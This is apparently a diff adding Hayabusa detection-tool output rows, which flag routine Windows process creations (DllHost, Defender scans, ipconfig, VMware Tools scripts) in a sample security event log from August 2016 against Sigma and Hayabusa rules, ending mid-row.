+2016-08-19 13:59:20.128 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0xb24 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 13:59:20.284 +00:00,IE10Win7,4688,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 14:01:29.243 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x22c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 14:04:54.584 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent 
Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 14:14:24.131 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 15:13:21.141 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 16:01:36.820 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xf8c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 16:01:36.883 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x268 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 16:01:36.898 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xc68 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 
+2016-08-19 16:03:36.695 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x68c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 16:03:36.695 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 16:04:11.148 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 16:57:08.802 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0xc5c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 16:57:08.802 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 17:02:48.677 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding | Path: C:\Windows\System32\rundll32.exe | PID: 0xcbc | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 17:02:48.677 
+00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 17:02:52.614 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x598 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 20:09:55.671 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x3cc | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 20:09:57.781 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb84 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 20:10:11.609 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe9c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 20:10:17.702 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe 
/Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x2f0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 20:12:20.805 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xfd0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 20:12:20.805 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x46c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 20:47:30.057 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 20:47:31.026 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x6a0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 20:47:31.073 
+00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x9c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 20:47:46.745 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe6c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 20:48:04.531 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 21:00:18.540 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 21:12:04.462 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xda0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 21:12:28.290 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x130 | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 21:12:41.946 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x4b0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 21:13:05.290 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfe4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 21:58:00.015 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 22:02:11.546 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 23:02:20.062 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfe0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 23:02:20.640 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xd18 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 23:02:22.265 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x910 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 23:02:35.890 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x494 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 23:02:40.458 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x720 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 23:02:40.458 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x914 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 16:03:05.379 +00:00,IE10Win7,4688,low,Evas,Windows 
Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 16:03:06.082 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\makecab.exe"" C:\Windows\Logs\CBS\CbsPersist_20160820160305.log C:\Windows\Logs\CBS\CbsPersist_20160820160305.cab | Path: C:\Windows\System32\makecab.exe | PID: 0xce8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 16:03:06.176 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdb0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 16:03:07.144 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xf34 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 16:03:07.801 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x250 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 16:03:11.676 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x614 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 16:03:25.457 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 16:03:25.457 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 16:03:25.629 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc04 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 16:06:05.381 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x598 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 16:06:05.381 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 16:06:05.506 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent 
Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 17:08:23.507 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 18:04:16.514 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 18:14:25.528 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x848 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 18:14:25.546 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xd30 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 18:14:25.561 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xfb8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 
+2016-08-20 18:16:25.456 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x7b8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 18:16:25.456 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 19:12:53.520 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 19:31:04.654 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc18 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 20:05:57.675 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xdac | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 20:05:58.135 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb68 | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 20:06:13.653 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf2c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 20:06:19.672 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdf0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 20:06:38.077 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xac0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 20:06:38.083 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x578 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:00:11.029 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent 
Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:00:11.250 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd68 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:00:12.103 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xc20 | User: IE10WIN7$ | LID: 